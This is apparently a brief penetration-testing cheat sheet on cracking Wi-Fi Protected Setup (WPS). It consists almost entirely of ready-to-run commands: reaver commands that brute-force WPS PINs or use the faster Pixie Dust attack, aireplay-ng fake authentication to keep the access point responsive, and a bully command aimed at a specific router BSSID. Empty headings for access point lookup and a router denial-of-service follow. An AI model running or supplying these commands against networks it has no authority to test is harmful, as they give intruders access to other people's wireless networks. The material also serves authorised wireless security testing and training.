WPS

Reaver:

# The next command brute forces WPS pins, online cracking similar to hydra (-vvv for verbose, --no-associate if we have previously associated with aireplay-ng --fakeauth)
reaver -b <AP bssid> -i wlan0mon -v
reaver --bssid <AP bssid> --channel <AP channel> --interface wlan0mon -vvv --no-associate

# Pixie attack (-K), faster than the regular brute force, but doesn't always work, depends on the AP PRGA 
reaver -i {monitor interface} -b {BSSID of router} -c {router channel} -vvv -K 1 -f
# OR 
reaver -b <AP BSSID> -i wlan0mon -v -A --no-nacks # lower timedelay between guess using -d 0 or --dh-small 

# When the previous command is sent it stays waiting if we are not associated with the AP. We can do it with aireplay, so that the AP doesn't ignore the future packets that we will send (instead of 0 we can use a certain number of seconds to be associated)
sudo aireplay-ng --fakeauth 120 -a <AP bssid> wlan0mon

Bully:

bully -d wlan0mon -b F0:7D:68:44:61:EA -B -c 6

AP lookup:

DoS Router to restart/unlock WPS:

Last updated